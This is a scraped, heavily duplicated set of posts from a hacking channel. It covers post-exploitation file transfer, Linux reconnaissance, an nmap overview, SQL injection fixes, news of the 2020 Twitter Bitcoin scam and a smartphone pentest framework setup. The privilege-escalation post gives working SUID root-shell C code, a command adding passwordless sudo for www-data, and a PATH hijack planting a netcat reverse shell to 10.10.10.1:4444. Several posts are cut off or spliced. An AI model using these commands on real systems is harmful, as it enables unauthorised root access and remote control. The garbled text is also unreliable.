β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ File Transfers
- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.
- Simple Local Web Servers
- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server
- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
- Run a basic PHP http server
php -S $ip:80
- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*
- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
> echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
> echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Enjoy β€οΈππ»
β github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ File Transfers
- Post exploitation refers to the actions performed by an attacker,
once some level of control has been gained on his target.
- Simple Local Web Servers
- Run a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80
- Run a basic Python3 http server, great for serving up shells
etc
python3 -m http.server
- Run a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
- Run a basic PHP http server
php -S $ip:80
- Creating a wget VB Script on Windows:
*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*
- Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
> echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
> echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
> echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Enjoy β€οΈππ»
β github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Linux commands for install programs :
Command Result
dpkg -l Installed packages (Debian)
rpm -qa Installed packages (Red Hat)
sudo -V Sudo version β does an exploit exist?
httpd -v Apache version
apache2 -v As above
apache2ctl (or apachectl) -M List loaded Apache
modules
mysql --version Installed MYSQL version details
psql -V Installed Postgres version details
perl -v Installed Perl version details
java -version Installed Java version details
python --version Installed Python version details
ruby -v Installed Ruby version details
find / -name %programname% 2>/dev/null (i.e. nc, netcat, wget,
nmap etc) Locate βusefulβ programs (netcat, wget etc)
which %programname% (i.e. nc, netcat, wget, nmap etc) As above
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc' 2>/dev/null| grep gcc 2>/dev/null List available compilers
cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.export /,"")}1' Which account is Apache running as
Enjoy β€οΈππ»
β github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Linux commands for install programs :
Command Result
dpkg -l Installed packages (Debian)
rpm -qa Installed packages (Red Hat)
sudo -V Sudo version β does an exploit exist?
httpd -v Apache version
apache2 -v As above
apache2ctl (or apachectl) -M List loaded Apache
modules
mysql --version Installed MYSQL version details
psql -V Installed Postgres version details
perl -v Installed Perl version details
java -version Installed Java version details
python --version Installed Python version details
ruby -v Installed Ruby version details
find / -name %programname% 2>/dev/null (i.e. nc, netcat, wget,
nmap etc) Locate βusefulβ programs (netcat, wget etc)
which %programname% (i.e. nc, netcat, wget, nmap etc) As above
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc' 2>/dev/null| grep gcc 2>/dev/null List available compilers
cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.export /,"")}1' Which account is Apache running as
Enjoy β€οΈππ»
β github topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The initial stage of information collection is scanning.
What is investigation?
Reconnaissance is to collect as much information as possible on the target network. From a hacker's point of view, information collection is very helpful for attacks. Generally speaking, the following information can be collected:
Email, port number, operating system, running service, Traceroute or DNS information, firewall identification and escape, etc.
1οΈβ£Introduction to NMAP
Nmap is a network connection end scanning software, used to scan the open network connection end of the computer on the Internet. Determine which services are running on which connections, and infer which operating system the computer is running (this is also known as fingerprinting). It is one of the necessary software for network administrators and is used to evaluate network system security.
> NMAP script engine
The NMAP script engine is the most powerful and flexible feature of NMAP. It allows users to write simple scripts to automate various network tasks, basically these scripts are written in lua language. Usually NMAP's script engine can do many things, such as:
2οΈβ£Network discovery
This is the basic function of NMAP. Examples include finding the whois information of the target domain name, querying the ownership of the target ip on ARIN, RIPE, or APNIC, finding open ports, SNMP query and listing available NFS/SMB/RPC shares and services .
3οΈβ£Vulnerability detection
When a new vulnerability is discovered, you want to quickly scan the network to identify vulnerable systems before intruders. Although NMAP is not a comprehensive vulnerability scanner, NSE is powerful enough to handle demanding vulnerability checks. Many vulnerable scripts are already available, and more scripts are planned.
4οΈβ£Backdoor detection
Many attackers and some automated worms will leave back doors so that they can be re-entered later. Some of them can be detected by NMAP based on regular expressions.
5οΈβ£Exploit
As a scripting language, NSE can even exploit vulnerabilities, not just find them. The ability to add custom attack scripts may be valuable to some people (especially penetration testers), but it is not intended to develop NMAP into something like the metasploit framework.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The initial stage of information collection is scanning.
What is investigation?
Reconnaissance is to collect as much information as possible on the target network. From a hacker's point of view, information collection is very helpful for attacks. Generally speaking, the following information can be collected:
Email, port number, operating system, running service, Traceroute or DNS information, firewall identification and escape, etc.
1οΈβ£Introduction to NMAP
Nmap is a network connection end scanning software, used to scan the open network connection end of the computer on the Internet. Determine which services are running on which connections, and infer which operating system the computer is running (this is also known as fingerprinting). It is one of the necessary software for network administrators and is used to evaluate network system security.
> NMAP script engine
The NMAP script engine is the most powerful and flexible feature of NMAP. It allows users to write simple scripts to automate various network tasks, basically these scripts are written in lua language. Usually NMAP's script engine can do many things, such as:
2οΈβ£Network discovery
This is the basic function of NMAP. Examples include finding the whois information of the target domain name, querying the ownership of the target ip on ARIN, RIPE, or APNIC, finding open ports, SNMP query and listing available NFS/SMB/RPC shares and services .
3οΈβ£Vulnerability detection
When a new vulnerability is discovered, you want to quickly scan the network to identify vulnerable systems before intruders. Although NMAP is not a comprehensive vulnerability scanner, NSE is powerful enough to handle demanding vulnerability checks. Many vulnerable scripts are already available, and more scripts are planned.
4οΈβ£Backdoor detection
Many attackers and some automated worms will leave back doors so that they can be re-entered later. Some of them can be detected by NMAP based on regular expressions.
5οΈβ£Exploit
As a scripting language, NSE can even exploit vulnerabilities, not just find them. The ability to add custom attack scripts may be valuable to some people (especially penetration testers), but it is not intended to develop NMAP into something like the metasploit framework.
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Local Privilege Escalation #Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a
superuser, you can update the UID / GID and shell as required.\
1) SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
2) SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
3) Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
4) Create and compile an SUID from a limited shell (no file transfer)
echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
5) Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
>
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
6) You may find a command is being executed by the root user, you may be able to modify the system PATH environment variableto execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
port 4444.
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x ssh
Enjoy β€οΈππ»
β git 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Vulnerability solution
SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Vulnerability solution
SQL injection vulnerability solutions:
1. The key to solving SQL injection vulnerabilities is to strictly check all data input from users and use the principle of least privilege for database configuration
2. All query statements use the parameterized query interface provided by the database, and the parameterized statements use parameters instead of embedding user input variables into the SQL statement.
The special characters ('"\<>&*; etc.) entering the database are escaped or coded.
4. Confirm the type of each data. For example, numeric data must be numeric, and the storage field in the database must correspond to int type.5. The data length should be strictly regulated, which can prevent the relatively long SQL injection statement from being executed correctly to a certain extent.
6. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding. Inconsistent upper and lower encoding may cause some filtering models to be bypassed.
7. Strictly restrict the operation authority of the website user's database, and provide this user with authority that can only satisfy his work, thereby minimizing the harm of injection attacks to the database.
8. Avoid websites displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
9. Before the website is released, it is recommended to use some professional SQL injection detection tools to detect and patch these SQL injection vulnerabilities in time
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news
> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.
> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.
> Martin stated that despite Coinbaseβs actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.
> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.
> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.
> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.
> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: βWe can see a very small amount of data flowing to a known, regulated encrypted exchange system.β However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.
> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."
> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hackerβs address, and as part of BitPayβs standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.
CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Coinbase said it prevented more than 1,100 customers from trading with Twitter hackers
#news
> According to foreign media reports, cryptocurrency trading company Coinbase said that it recently prevented more than 1,100 customers from sending bitcoin to Twitter hackers. Last week, these hackers hijacked some well-known accounts to promote a Bitcoin scam. Philip Martin, Coinbase's chief information security officer, told Forbes that if Coinbase does not take this measure, these customers will send a total of 30.4 bitcoins (currently worth about $278,000) to hackers.
> It is worth noting that this amount is more than twice the actual amount ($121,000) collected by the hacker through the victim.
> Martin stated that despite Coinbaseβs actions, 14 of its customers were still victims of the scam, and they sent hackers about $3,000 worth of Bitcoin before their addresses were blacklisted.
> The report shows that users of Gemini, Kraken and Binance have also tried to send bitcoin to these addresses, but the amount is not as large as Coinbase. All these exchanges acted immediately after the scam was exposed and blocked these addresses.
> It is reported that this widespread attack took place on Twitter on Wednesday local time in the United States. The celebrities affected include former US President Barack Obama, Microsoft co-founder Bill Gates and Tesla CEO Elon Musk. Wait.
> The blockchain analysis company claims that some stolen bitcoins have been transferred to some exchanges and mixed bitcoin merchants such as Wasabi Wallet.
> Tom Robinson, co-founder and chief scientist of Elliptic, told The Block: βWe can see a very small amount of data flowing to a known, regulated encrypted exchange system.β However, for confidentiality reasons, he refused to disclose the name of the exchange. But Robinson further stated that 2.89 bitcoin (22% of the total amount) was sent to the mustard wallet.
> Another blockchain analysis company, Whitestream, told The Block that the address of one of the hackers had already conducted transactions with at least three cryptocurrency platforms. Itsik Levy, Co-founder and CEO of Whitestream, told The Block: "We can see that an address is connected to addresses related to several digital currency payment processors (CoinPayments, Coinbase, BitPay)."
> In fact, a BitPay spokesperson confirmed to The Block that in May 2020, one of its merchants remitted $25 from a Twitter hackerβs address, and as part of BitPayβs standard processes and procedures, they are remittances. The detailed information obtained risks to related parties including law enforcement agencies.
CoinPayments declined to comment on this matter, and Coinbase did not respond to a request for comment.
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hacking a smartphone using Kali-for beginers by undercode :
> Kali is a Linux flavored program used by hackers and security professionals. A very popular and irreplaceable item. I will not describe the pros and cons, but let's get down to business:
Step 1: Open Terminal
Of course, to get started, fire up Kali and open a terminal.
Step 2: Install the required libraries
To run these Android virtual devices on 64-bit Debian operating systems (such as Kali), we need to install a few key libraries that are not included by default. Fortunately, they are all in the Kali repository.
kali> apt-get install lib32stdc ++ 6 lib32ncurses5 lib32zl
Installing these three libraries is enough to get us going, we can now start installing the Android Software Developer Kit (SDK).
Step 3: Install Android SDK
From yo ur browser go to the "Android SDK" website and download the Android SDK installer. Make sure you download the Linux kit. You can download and install the Windows or Mac options and then test these virtual devices in Kali, but this will be a more complex option. Let's go the easy way and set everything in Kali.
π¦Hacking a smartphone using Kali-for beginers by undercode :
> Kali is a Linux flavored program used by hackers and security professionals. A very popular and irreplaceable item. I will not describe the pros and cons, but let's get down to business:
Step 1: Open Terminal
Of course, to get started, fire up Kali and open a terminal.
Step 2: Install the required libraries
To run these Android virtual devices on 64-bit Debian operating systems (such as Kali), we need to install a few key libraries that are not included by default. Fortunately, they are all in the Kali repository.
kali> apt-get install lib32stdc ++ 6 lib32ncurses5 lib32zl
Installing these three libraries is enough to get us going, we can now start installing the Android Software Developer Kit (SDK).
Step 3: Install Android SDK
From yo ur browser go to the "Android SDK" website and download the Android SDK installer. Make sure you download the Linux kit. You can download and install the Windows or Mac options and then test these virtual devices in Kali, but this will be a more complex option. Let's go the easy way and set everything in Kali.
Forwarded from WEB UNDERCODE - PRIVATE
Once you've downloaded it, you can extract it using Kali's GUI archiving tool, or using the command line.
Extracting the Cali GUI
Step 4: Go to the tools directory
Next, we need to navigate to the tools directory of the SDK directory.
kali> cd / android-pentest-framework / sdk / tools
SDK tools
Once we are in the tools directory, we can launch the Android application. Just enter
kali> / android
Kali Androyd Installation
When you do this, the SDK manager will open the GUI as above. We will now download two versions of the Android operating system to practice our smartphone hacking, Android 4.3 and Android 2.2. Make sure you find them among this list, click on the box next to them, and click on the "install XX packages" button. This will force the SDK to load these operating systems into your Kali.
Step 5: Android Virtual Device Manager
After we have downloaded all the packages, we now need to build our Android virtual devices, or AVDs. From the SDK manager pictured above, select Tools -> Manage AVDs which will open an interface like below from Android Virtual Device Manager.
> Click on the "Create" button, which will open such an interface below. Create two Android virtual devices, one for Android 4.3 and one for Android 2.2. I just named my devices "Android 4.3" and "Android 2.2" and I recommend that you do the same.
> Create a virtual android device
Select a Nexus 4 device and the corresponding target (API 18 for Android 4.3 and API 8 for Android 2.2) and "Skin with dynamic hardware controls." You should leave the rest of the settings at their default values, with the exception of adding a 100 MiB SD card.
Step 6: launching the Android virtual device
After creating two Android virtual devices, the Android Virtual Device Manager should look like two devices.
This will launch the Android emulator creating your Android virtual device. Please be patient this may take a while. When he's finished, you should be greeted by a virtual smartphone on your Kali desktop!
Step 7: Install the Pentest Framwork smartphone
The next step is to install Smartphone Pentest Framework. You can use git clone to download it to
kali> git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git
π¦Installing Smartphone Pentest Framework
Step 8: Starting Apache
As you need a web server and MySQL database, go ahead and start both of these services
kali> service apache2 startkali> service mysql start
Step 9: change the configuration.
Like almost all Linux applications, Smartphone Pentest Framework is configured using a text configuration file. First you need to go to the directory with the framework console subdirectory
kali> CD / root / Smartphone-Pentest-Framework / frameworkconsole
Then open the config file in any text editor. In this case, I used Leafpad
kali> leafpad config
> We will need to edit the IPADDRESS variable and SHELLIPADDRESS variable to reflect the actual IP address of your Kali system (you can find it by entering "ifconfig").
Step 10: Launch the platform
We are now ready to launch the Smartphone Pentest Framework. Just enter
kali> ./framework.py
And that should open the Framework menu as shown below.
Finish! We are now ready to start hacking smartphones!
enjoyβ€οΈππ»
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Extracting the Cali GUI
Step 4: Go to the tools directory
Next, we need to navigate to the tools directory of the SDK directory.
kali> cd / android-pentest-framework / sdk / tools
SDK tools
Once we are in the tools directory, we can launch the Android application. Just enter
kali> / android
Kali Androyd Installation
When you do this, the SDK manager will open the GUI as above. We will now download two versions of the Android operating system to practice our smartphone hacking, Android 4.3 and Android 2.2. Make sure you find them among this list, click on the box next to them, and click on the "install XX packages" button. This will force the SDK to load these operating systems into your Kali.
Step 5: Android Virtual Device Manager
After we have downloaded all the packages, we now need to build our Android virtual devices, or AVDs. From the SDK manager pictured above, select Tools -> Manage AVDs which will open an interface like below from Android Virtual Device Manager.
> Click on the "Create" button, which will open such an interface below. Create two Android virtual devices, one for Android 4.3 and one for Android 2.2. I just named my devices "Android 4.3" and "Android 2.2" and I recommend that you do the same.
> Create a virtual android device
Select a Nexus 4 device and the corresponding target (API 18 for Android 4.3 and API 8 for Android 2.2) and "Skin with dynamic hardware controls." You should leave the rest of the settings at their default values, with the exception of adding a 100 MiB SD card.
Step 6: launching the Android virtual device
After creating two Android virtual devices, the Android Virtual Device Manager should look like two devices.
This will launch the Android emulator creating your Android virtual device. Please be patient this may take a while. When he's finished, you should be greeted by a virtual smartphone on your Kali desktop!
Step 7: Install the Pentest Framwork smartphone
The next step is to install Smartphone Pentest Framework. You can use git clone to download it to
kali> git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git
π¦Installing Smartphone Pentest Framework
Step 8: Starting Apache
As you need a web server and MySQL database, go ahead and start both of these services
kali> service apache2 startkali> service mysql start
Step 9: change the configuration.
Like almost all Linux applications, Smartphone Pentest Framework is configured using a text configuration file. First you need to go to the directory with the framework console subdirectory
kali> CD / root / Smartphone-Pentest-Framework / frameworkconsole
Then open the config file in any text editor. In this case, I used Leafpad
kali> leafpad config
> We will need to edit the IPADDRESS variable and SHELLIPADDRESS variable to reflect the actual IP address of your Kali system (you can find it by entering "ifconfig").
Step 10: Launch the platform
We are now ready to launch the Smartphone Pentest Framework. Just enter
kali> ./framework.py
And that should open the Framework menu as shown below.
Finish! We are now ready to start hacking smartphones!
enjoyβ€οΈππ»
WRITTEN BY UNDERCODE
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - georgiaw/Smartphone-Pentest-Framework: Repository for the Smartphone Pentest Framework (SPF)
Repository for the Smartphone Pentest Framework (SPF) - georgiaw/Smartphone-Pentest-Framework
Forwarded from WEB UNDERCODE - PRIVATE
Hacking a smart phone steps by undercode